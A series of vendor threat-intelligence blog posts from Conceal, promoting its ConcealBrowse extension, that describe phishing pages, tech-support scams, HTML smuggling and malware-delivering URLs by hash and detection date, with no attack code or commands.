Conceal’s Weekly Threat Reports are highlights of recently detected sites that were deemed suspicious using our AI-powered browser extension, ConcealBrowse.

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

Browser-Based Threat Report: Nov. 20

/in /by

Browser-Based Threat Report

Week of November 20th, 2023

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of November 20th, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

_____________

SHA-256: fb9182a611e6c357d3d7876f898ce7246ad777e69367d983042a04bb93d8bd29

This URL was detected by ConcealBrowse on November 14th, 2023. It was first identified by various CTI feeds on November 15th, 2023. This showcases the importance of real-time analysis which is enabled by ConcealBrowse. To date, only 3 other security vendors have identified this URL.

The page was highlighted by vendors due to its poor creation. The site is missing many common elements of safe sites, such as author and copyright meta tags, favicons, and includes a high number of embedded images. In addition to third party vendor suspicion, ConcealBrowse intervened due to the abundance of null and void links found on the page. Poorly crafted and maintained websites are often targeted and used to propagate spam and malware.

_____________

SHA-256: 2c3f85699de22827b33ef601739924844e913db62198ef8acfd64c66c5c434a3

This URL was detected by ConcealBrowse on November 15th, 2023. The URL was first identified by 3 security vendors on October 13th, 2023. Today, 5 vendors have categorized it as suspicious, phishing, and even malware.

The delivered page asks users to enable notifications. Once enabled, multiple notifications appear on the screen (see below) that inform users that their computer is infected. Mimicking a trusted security vendor, the adversary convinces users to engage with the popups, which then initiates an HTML file download. This file conducts the following MITRE ATT&CK techniques; Persistence and Privilege Escalation through registry run key creation, Defense Evasion via masquerading, Discovery via Simple Service Discovery Protocol broadcast queries, and Command and Control through encrypted HTTPS channel.

_____________

SHA-256: 31cf2c5502691f5f875cb1f65f3e19458009ecacfaabd007e07d5475348ad042

This web page was detected by ConcealBrowse on November 16th, 2023 and was first identified as malicious October 10, 2022. As of November 16th, the URL has been annotated as

malicious, malware, and suspicious by 4 security vendors in total. This shows the dynamic reputation of webpages, thus emphasizing the importance of real time URL analysis; which is enabled with Conceal Browse.

Further analysis of this web site shows that there are several files that are flagged as malicious including two JavaScript files and a .ico file. These JavaScript files are shown to match a YARA rule that detect the presence of a Base64_Encoded_URL which is a common theme among recent examples where ConcealBrowse has intervened to protect the endpoint.

It is important to note that the site appears to have been taken down.

_____________

Valuable Outcomes

ConcealBrowse offers comprehensive protection against many sophisticated cyber threats, as recent threat reports exemplify. Our advanced threat detection capabilities have successfully flagged and quarantined malicious web pages, preventing users from falling victim to various cyber-attacks. Conceal remains dedicated to upholding the integrity of online interactions, constantly refining our detection algorithms and threat identification protocols to ensure proactive protection against emerging cyber threats. By integrating cutting-edge technology and a robust security infrastructure, we empower users to navigate the digital landscape with confidence, knowing that their online activities are shielded from potential harm.

Join the Conceal Community and claim your FREE ConcealBrowse licenses!

Join the Conceal Community today and fortify your online security for free! Don’t miss the chance to benefit from our advanced threat protection and stay one step ahead of cybercriminals. Experience peace of mind while browsing the internet, knowing that ConcealBrowse is your shield against the ever-evolving threat landscape. Take the proactive step towards a safer online experience – get your free ConcealBrowse license now and join a community committed to safeguarding your digital world.

Sign up for the Conceal Community and claim your free licenses by completing the form below.


Browser-Based Threat Report: Nov. 13

/in /by

Browser-Based Threat Report

Week of November 13th, 2023

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs and Browser-Based Threats. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of November 13th, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

_____________

SHA-256: 02f7c0e429b7388692f75d54bfde7e6bc2f1f68160efa434e306bd7d352f41c0

This URL was detected by ConcealBrowse on November 8th, 2023. It was first identified by various CTI feeds on October 5th, 2023, and resubmitted on November 9th, 2023, highlighting the continued nefarious activity of the domain. To date, 16 security vendors have annotated the URL as malicious.

This page takes advantage of typosquatting, in which end users accidentally type in the wrong web address, which then leads them to a page that mimics their intended destination. This specific instance mimics a popular shopping page and seems harmless. The intent of the majority of these spoofed sites is to obtain sensitive information from the end user, such as credit card information and address, during the checkout process.

_____________

SHA-256: f84a8fa0bc3dd592124b7a14a1bb64cb4fe8b40626c58d5c0341a3d590975500

This URL was detected by ConcealBrowse on November 6th, 2023. The URL was first detected by 2 security vendors on November 4th and by 18 security vendors to date. The URL has been classified as malicious and subsequently as a delivery vector for malware and spam.

The top-level domain used by the page is notorious for hosting malicious and risky web pages. Further, research indicates that nearly half of the registered domains using “.top” are used for nefarious activity such as spam and malware distribution. This specific URL directed users to a page that hosted various malware from Arkei, Privateloader, and Vidar. Their purpose is to steal information from the endpoints they infect, including saved passwords, credit card information, and the latest being 2-factor authentication tokens.

_____________

SHA-256: 82cf0044f474bbef6e896f0e741f0795fe6c2abcc7facec854e5967a17b89ea5

This web page was detected by ConcealBrowse on November 9th, 2023, and was first identified as malicious on September 28th, 2022. As of November 14th, the URL has been annotated as malicious, malware, and suspicious by 6 security vendors in total. This shows the dynamic reputation of webpages, thus emphasizing the importance of real-time URL analysis, which is enabled with Conceal Browse.

The web page is hosted by a web server that has historically hosted other malicious sites. In addition, the URL has recently been seen downloading two files of unknown content and has several embedded JavaScript files. After further static and dynamic analysis, the embedded JS files appear to modify the DOM of the parent URL. Due to this behavior, the URL has been identified by security vendors and has even been sinkholed by various DNS providers.

_____________

Valuable Outcomes

ConcealBrowse offers comprehensive protection against many sophisticated cyber threats, as recent threat reports exemplify. Our advanced threat detection capabilities have successfully flagged and quarantined malicious web pages, preventing users from falling victim to various cyber-attacks. Conceal remains dedicated to upholding the integrity of online interactions, constantly refining our detection algorithms and threat identification protocols to ensure proactive protection against emerging cyber threats. By integrating cutting-edge technology and a robust security infrastructure, we empower users to navigate the digital landscape with confidence, knowing that their online activities are shielded from potential harm.

Join the Conceal Community and claim your FREE ConcealBrowse licenses!

Join the Conceal Community today and fortify your online security for free! Don’t miss the chance to benefit from our advanced threat protection and stay one step ahead of cybercriminals. Experience peace of mind while browsing the internet, knowing that ConcealBrowse is your shield against the ever-evolving threat landscape. Take the proactive step towards a safer online experience – get your free ConcealBrowse license now and join a community committed to safeguarding your digital world.

Sign up for the Conceal Community and claim your free licenses by completing the form below.


Browser-Based Threat Report: Nov. 6

/in /by

Browser-Based Threat Report

Week of November 6th, 2023

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs and Browser-Based Threats. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of November 6th, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

_____________

SHA-256: e487be0271aa1047e6dd76c59aa6b04094c99113188f9fa139c39497097228c7

This URL was detected by ConcealBrowse on November 3rd, 2023, with it first being submitted to a various CTI feeds November 4th, showcasing how Conceal Browse protects users from the unknown.

When visiting the page, users encounter various pop-ups that state the workstation is infected with malware. This common tech support scam then prompts the end user to call the number listed in the pop-up to remedy the infection. Often, the scammers attempt to elicit payment from users, or entice them to download some sort of remote access software from the page, thus granting access to the endpoint. The Remote Access Trojan, if downloaded, grants persistent access with registry keys, gains elevated privileges and even bypasses file scanning and monitoring tools using various masquerading tactics.

_____________

SHA-256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

This web page was detected by ConcealBrowse on November 3rd, 2023 with it first being identified by CTI feeds the same day. To date, only 4 security vendors have identified this

threat. This highlights the ability of Conceal Browse to identify current adversary techniques and delivery methods.

The original URL in question has various redirects that lead the end user to a spoofed McAfee home page. The final page, seen below, is very interactive, meaning the spoofed page has been well crafted to increase its legitimacy. The spoofed page, which is hosted across numerous Russian based web servers, was dynamically creating help and feedback buttons, hoping users would engage. It was discovered that the domain was seen delivering backdoors via this technique in previous campaigns.

_____________

SHA-256: cba292db6c58d7028353ca98ee27dc334640987670b15cb83f2b419686596996

This currently active URL was detected by ConcealBrowse on November 2nd, 2023, with variations of the malicious pathname (intentionally removed above) identified throughout the first week of November 2023. The URL prevented by Conceal Browse has since been identified by 10 security vendors, who have classified the delivered webpage as malicious, suspicious, phishing, and even malware. The domain has been identified as a known infection source from reputable CTI feeds, indicating that nefarious content is continuously delivered.

The webpage is a blog that has various referrer headers that request resources from legitimate domains such as Google and Youtube. The page, however, does request resources from a known malicious domain that has was seen downloading suspicious HTML files just a week ago. Since the page is requesting resources from a known malicious domain, the page should be avoided.

_____________

Valuable Outcomes

ConcealBrowse offers comprehensive protection against many sophisticated cyber threats, as recent threat reports exemplify. Our advanced threat detection capabilities have successfully flagged and quarantined malicious web pages, preventing users from falling victim to various cyber-attacks. Conceal remains dedicated to upholding the integrity of online interactions, constantly refining our detection algorithms and threat identification protocols to ensure proactive protection against emerging cyber threats. By integrating cutting-edge technology and a robust security infrastructure, we empower users to navigate the digital landscape with confidence, knowing that their online activities are shielded from potential harm.

Join the Conceal Community and claim your FREE ConcealBrowse licenses!

Join the Conceal Community today and fortify your online security for free! Don’t miss the chance to benefit from our advanced threat protection and stay one step ahead of cybercriminals. Experience peace of mind while browsing the internet, knowing that ConcealBrowse is your shield against the ever-evolving threat landscape. Take the proactive step towards a safer online experience – get your free ConcealBrowse license now and join a community that’s committed to safeguarding your digital world.

Sign up for the Conceal Community and claim your free licenses by completing the form below.


Browser-Based Threat Report: Oct. 30

/in /by

Browser-Based Threat Report

Week of October 30th, 2023

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs and Browser-Based Threats. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of October 30th, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

_____________

SHA-256: 95bd5672de917dd113b5a48f4347931661dced296f6b83d2e76c002f3847e926

Browser-Based Threat Report

This URL was detected by ConcealBrowse on October 27th, 2023, with it first being submitted to a various CTI feeds October 13th and most recently October 25th, 2023.

The page was last seen delivering an innocent seeming HTML file that has encoded Javascript. The file dynamically reconstructs new HTML code as it opens in the browser and presents to the end user, a spoofed Microsoft login page, as seen above. Fortunately, Conceal Browse identified anomalies associated with the page and prevented the HTML smuggling

attack occurring in the first place, subsequently stopping the credential theft attempt.

This attack type is becoming increasingly popular due to it’s stealthiness. The drive by downloaded HTML file is not only being delivered by a reputable source (in this case, CloudFlare’s development platform) but is also encoded, then decoded and reconstructed locally to bypass web proxies and email gateways.

_____________

SHA-256: fc93937220e51c05c4c2273fe7ae0d8f50b0faafb1c1f02659bb3c0652f5b421

This web page was detected by ConcealBrowse on October 30th, 2023 with it first being submitted to CTI feeds on October 31st, 2023. This showcases Conceal’s ability to identify risky webpages in real time, even before CTI feeds report on them. This type of attack has been seen in several of Conceal’s customer environments.

The delivered page mimics the Yahoo home page by pulling legitimate assets such as images, an iFrame and even a script from Yahoo.com, which is not common practice. Any assets pulled from legitimate sites are mainly through their content delivery network. The adversaries spent a decent amount of time on crafting the page, which included 168 legitimate links leading to Yahoo. However, the page did have a high amount of empty and void links, which is indicative of phishing sites. Threat actors often do not have the time or ability to fully mimic web page functionality. With that, the site has been subsequently identified by 5 security vendors as a phishing site.

Browser-Based Threat Report

_____________

SHA-256:da9bb3966753582f1ad63eb91315ce3207b33bec9b166adc7048ddcc70258a40

This currently active URL was detected by ConcealBrowse on October 25th, 2023. Although the webpage was first submitted to various CTI feeds October 31st, 2021, it was resubmitted the morning of October 31st, 2023, meaning the page continues to deliver suspicious content.

The webpage is a login page to a commoditized Phishing-as-a-Service (PhaaS) provider based out of Russia that has been operating since June 2021. As a purchasable nefarious phishing service, the page should not be trusted.

Browser-Based Threat Report

_____________

Valuable Outcomes

ConcealBrowse offers comprehensive protection against many sophisticated cyber threats, as recent threat reports exemplify. Our advanced threat detection capabilities have successfully flagged and quarantined malicious web pages, preventing users from falling victim to various cyber-attacks. Conceal remains dedicated to upholding the integrity of online interactions, constantly refining our detection algorithms and threat identification protocols to ensure proactive protection against emerging cyber threats. By integrating cutting-edge technology and a robust security infrastructure, we empower users to navigate the digital landscape with confidence, knowing that their online activities are shielded from potential harm.

Join the Conceal Community and claim your FREE ConcealBrowse licenses!

Join the Conceal Community today and fortify your online security for free! Don’t miss the chance to benefit from our advanced threat protection and stay one step ahead of cybercriminals. Experience peace of mind while browsing the internet, knowing that ConcealBrowse is your shield against the ever-evolving threat landscape. Take the proactive step towards a safer online experience – get your free ConcealBrowse license now and join a community that’s committed to safeguarding your digital world.

Sign up for the Conceal Community and claim your free licenses by completing the form below.

 


Browser-Based Threat Report: Oct. 23

/in /by

Browser-Based Threat Report

Week of October 23rd, 2023

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs and Browser-Based Threats. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of October 23rd, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

One of which, ConcealBrowse was able to identify one of these threats seven days before the other threat feeds.

_____________

SHA-256: 0b52c5338af355699530a47683420e48c7344e779d3e815ff9943cbfdc153cf2

This URL was detected by ConcealBrowse on October 17th, 2023, with it first being submitted to a handful of CTI feeds on October 15th, 2023. The webpage has since been taken down. This 17-day lapse between domain registration and page deletion is a long time given today’s threat environment. This highlights the importance of real-time analysis, which Conceal Browse enables. In this gap, only 8 security vendors, including Conceal Browse, flagged the page as suspicious.

The webpage the URL led its victims to was seen downloading an HTML file that has a historically bad reputation for various actions such as C2 node callouts.

The serving IP address continues to host malicious domains and has been flagged as malicious by two security vendors. Other webpages hosted on the server have been featured in Conceal’s weekly threat report previously.

_____________

SHA-256: d772f4ce3ff3a63d73da19acb3864fa4b3cf01807ac6c9322db27d60e2f4e7fa

This web page was detected by ConcealBrowse on October 12th, 2023, with it first being submitted to CTI feeds on October 19th, 2023. This showcases Conceal’s ability to identify risky webpages in real-time, even before CTI feeds report on them.

The delivered webpage included a captcha, prompting the end user to click on the “allow” button in the fake notification displayed in the top left (see below). This is a common tactic in which attackers present iFrames or transparent overlays on top of seemingly innocuous and common user interactive dialogue boxes. The transparent iFrame is clicked by the user because it is common. However, the overlay executes script that often initiates a download or even displays a login screen for credentials to be captured. This specific webpage is no longer active; however, users should be cautious when they see this tactic in the wild.

_____________

SHA-256: 6f5d8c5bf77786b84d00504f8a8f790a2261f49aef0c11327b611b9e1e91ab6e

This currently active URL was detected by ConcealBrowse on October 23rd, 2023. Although the webpage was first submitted to various CTI feeds on July 17th, 2018, it was resubmitted the morning of October 24th, meaning the page continues to deliver suspicious content.

The webpage has recently been delivering an HTML file that has conducted HTTP requests to various .ru domains. The serving IP address has been annotated in the past as a malicious C2 node and, more recently, has been identified as a cryptomining server by other intelligence services.

_____________

Valuable Outcomes

ConcealBrowse offers comprehensive protection against many sophisticated cyber threats, as recent threat reports exemplify. Our advanced threat detection capabilities have successfully flagged and quarantined malicious web pages, preventing users from falling victim to various cyber-attacks. Conceal remains dedicated to upholding the integrity of online interactions, constantly refining our detection algorithms and threat identification protocols to ensure proactive protection against emerging cyber threats. By integrating cutting-edge technology and a robust security infrastructure, we empower users to navigate the digital landscape with confidence, knowing that their online activities are shielded from potential harm.

Join the Conceal Community and claim your FREE ConcealBrowse licenses!

Join the Conceal Community today and fortify your online security for free! Don’t miss the chance to benefit from our advanced threat protection and stay one step ahead of cybercriminals. Experience peace of mind while browsing the internet, knowing that ConcealBrowse is your shield against the ever-evolving threat landscape. Take the proactive step towards a safer online experience – get your free ConcealBrowse license now and join a community that’s committed to safeguarding your digital world.

Sign up for the Conceal Community and claim your free licenses by completing the form below.


Browser-Based Threat Report: Oct. 16

/in /by

Browser-Based Threat Report

Week of October 16th, 2023

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

At Conceal, your digital safety is our utmost priority. Our weekly threat report for the week of October 16th, 2023, unveils critical insights into the ever-evolving landscape of online threats.

The following report highlights recently detected sites that were deemed suspicious:

SHA-256 42a439f1d2c94a9d456fc25fd9ae758fd1a55b1061d4a9ba5e90406424f3f39c

This URL was detected by ConcealBrowse on October 16th, 2023, with it first being submitted to a handful of CTI feeds on September 21st, 2023.. The URL in question was recently submitted for new analysis on October 15th, 2023. To date, only 4 security vendors excluding ConcealBrowse have annotated this URL.

The link uses various http (insecure) redirects, which leads to gambling sites, spoofed shopping sites, and a suspicious download. More concerning, it also redirects to a QR code, which entices the end user to scan with their mobile device, which are often less secure than our PC’s and laptops. The QR code leads the user to another suspicious webpage that is being tracked by CTI feeds.

Additionally, the serving IP address annotated above has been seen delivering a W32 trojan variant as recently as October 8th, 2023.

_____________

SHA-256 18358a77382e2475a5dcc8445ef23a859d1d7cb698d6b31808f76104cf30fbfd

This web page was detected by ConcealBrowse on October 16th, 2023 with it first being submitted to CTI feeds on August 3rd, 2019. This site shows a continued trend of seeing compromised websites of smaller businesses go at length without being addressed.

When analyzing this site. It was flagged as malicious by multiple different vendors. Further analysis shows that this site contains several signatures including creating files in the system directory.

Several MITRE ATT&CK techniques are also found on this site at the time of analysis to include: Masquerading, Process Injection, Ingress Tools Transfer, Encrypted Channel, Application Layer Protocol, and Non-Application Layer Protocol.

_____________

SHA-256 18358a77382e2475a5dcc8445ef23a859d1d7cb698d6b31808f76104cf30fbfd

This currently active URL was detected by ConcealBrowse on October 16th, 2023. Although it was first submitted to various CTI feeds August 15th, 2023, it was resubmitted the morning of October 17th, meaning the delivered page has been compromised again.

The URL takes users to seemingly benign page offering a free PDF converter. When clicking “Download Now,” users download the converter and inadvertently, a malicious dropper file. The dropper file is a redline trojan variant.

_____________

Valuable Outcomes

ConcealBrowse offers comprehensive protection against a myriad of sophisticated cyber threats, as exemplified in recent threat reports. Our advanced threat detection capabilities have successfully flagged and quarantined malicious web pages, preventing users from falling victim to various cyber attacks. Conceal remains dedicated to upholding the integrity of online interactions, constantly refining our detection algorithms and threat identification protocols to ensure proactive protection against emerging cyber threats. By integrating cutting-edge technology and a robust security infrastructure, we empower users to navigate the digital landscape with confidence, knowing that their online activities are shielded from potential harm.

Join the Conceal Community and claim your FREE ConcealBrowse licenses!

Join the Conceal Community today and fortify your online security for free! Don’t miss the chance to benefit from our advanced threat protection and stay one step ahead of cybercriminals. Experience peace of mind while browsing the internet, knowing that ConcealBrowse is your shield against the ever-evolving threat landscape. Take the proactive step towards a safer online experience – get your free ConcealBrowse license now and join a community that’s committed to safeguarding your digital world.

Sign up for the Conceal Community and claim your free licenses by completing the form below.


Browser-Based Threat Report: Oct. 2

/in /by

Browser-Based Threat Report

Week of October 2nd, 2023

ConcealBrowse is leveraged by teams across the world to combat weaponized URLs. The technology is constantly analyzing suspicious web artifacts to identify risks in the form of drive-by attacks, phishing portals, and other threats that materialize while browsing.

In today’s digital landscape, threats to online security are ever-evolving, and staying one step ahead of malicious actors is essential. ConcealBrowse is your trusted partner in the battle against cyber threats. Our advanced threat detection and prevention system uncovered a severe security risk on September 20th, 2023, and we have been at the forefront of safeguarding online experience ever since.

The following report highlights recently detected sites that were deemed suspicious:

This web page was detected by ConcealBrowse on September 20th, 2023, with it first being submitted to various CTI feeds on March 20th, 2023. The page was recently submitted for analysis on September 21st, 2023, indicating that the page is continuously compromised to serve malicious content.

The compromised site was conducting drive-by downloads via embedded JavaScript files, delivering an HTML file with a sha256
of 0d3e98ca727fc1201b436170af5a63f23348aaf146a3ac6234f6c4da283e8b34.

Using various MITRE ATT&CK techniques to Evade Detection via process injection and conduct Command and Control via ingress tool transfer, the adversary can deliver the suspected credential harvesting HTML file and export the user supplied credentials.

_____________

This web page was detected by ConcealBrowse on September 29th, 2023 with it first being submitted to CTI feeds on December 29th, 2015. The page was most recently submitted September 23rd, 2023 due it’s continued nefarious activities. The page contains a redirect to hxxp:// survey-smiles[.]com that is delivering an HTML file with the sha256 of 10dbbd006c5099d6e4f1302ffb0bd95885c0b4caf4107de725b73c08bdb8a39d.

Upon further analysis of the original URL, it was identified to be a referred URL inside the strings of the njRAT-master trojan
(SHA-256: c6c2f7f109ce90b2874266c2dfea905bdca745dfac3922d674922de476109d30).

Finally, the hosting IP address has been reportedly communicating with various Win32 EXE files that are redirecting victims to a spoofed PayPal page, reinstalling adware, and delivering trojans amongst other malicious activities. Other URLs hosted on the same IP address are currently delivering malicious payloads and are actively phishing.

_____________

This currently active page was detected by ConcealBrowse on September 28th, 2023 with it first being submitted to various CTI feeds later that same day. When the page is loaded, it leads victims to a spoofed Microsoft login page that entices users to divulge their credentials. Fortunately, ConcealBrowse detected the page and not only sent it to isolation, but also prevented the user from entering in their password, as seen below.

_____________

Valuable Outcomes

ConcealBrowse offers comprehensive protection against a myriad of sophisticated cyber threats, as exemplified in recent threat reports. Our advanced threat detection capabilities have successfully flagged and quarantined malicious web pages, preventing users from falling victim to various cyber attacks. Conceal remains dedicated to upholding the integrity of online interactions, constantly refining our detection algorithms and threat identification protocols to ensure proactive protection against emerging cyber threats. By integrating cutting-edge technology and a robust security infrastructure, we empower users to navigate the digital landscape with confidence, knowing that their online activities are shielded from potential harm.

Join the Conceal Community and claim your FREE ConcealBrowse licenses!

Join the Conceal Community today and fortify your online security for free! Don’t miss the chance to benefit from our advanced threat protection and stay one step ahead of cybercriminals. Experience peace of mind while browsing the internet, knowing that ConcealBrowse is your shield against the ever-evolving threat landscape. Take the proactive step towards a safer online experience – get your free ConcealBrowse license now and join a community that’s committed to safeguarding your digital world.

Join us today, and together, let’s make the internet a safer place.